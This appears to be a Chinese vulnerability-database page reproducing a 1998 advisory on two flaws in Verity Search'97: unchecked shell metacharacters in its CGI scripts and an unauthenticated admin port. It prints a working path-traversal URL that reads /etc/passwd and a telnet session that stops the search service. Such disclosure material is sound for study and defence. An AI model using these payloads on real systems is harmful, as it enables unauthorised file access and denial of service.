Verity Search97 2.1 – Security
漏洞ID | 1053374 | 漏洞类型 | |
发布时间 | 1998-07-14 | 更新时间 | 1998-07-14 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Multiple | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/162/info
A pair of vulnerabilities exist in Verity's Search`97 web interface to the Verity search engine. The first vulnerability is due to cgi-bin scripts, s97_cgi and s97r_cgi failing to check for the existence of certain shell meta characters. This allows an attacker to access any file on the file system.
The second vulnerability is due to a lack of authentication being used to access the Verity administrative program. Any user can telnet to the appropriate port, and issue a command to shut the Verity software down.
s97_cgi:
http://www.xxx.com/search97.vts
?HLNavigate=On&querytext=dcm
&ServerKey=Primary
&ResultTemplate=../../../../../../../etc/passwd
&ResultStyle=simple
&ResultCount=20
&collection=books
tasmgr:
telnet to port 1972
0 Verity dcm ready
list
0 TAS-Primary
status tas-primary
0 TYPE=PROCESS; STATE=RUNNING; STARTUP=AUTO_START; PID=87632
stop tas-primary
0 'tas-primary' signalled
status tas-primary
0 TYPE=PROCESS; STATE=STOPPING; STARTUP=AUTO_START; PID=87632
where
0 /home/verity/_hpux10/bin/dcm.cfg
syslog服务拒绝漏洞 漏洞ID 1207599 漏洞类型 未知 发布时间 1997-01-01 更新时间 1997-01-01 CVE编号 CVE-1999-0171 CNNVD-ID CNNVD-199701-016 漏洞平台 N/A CVSS评分 2.…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666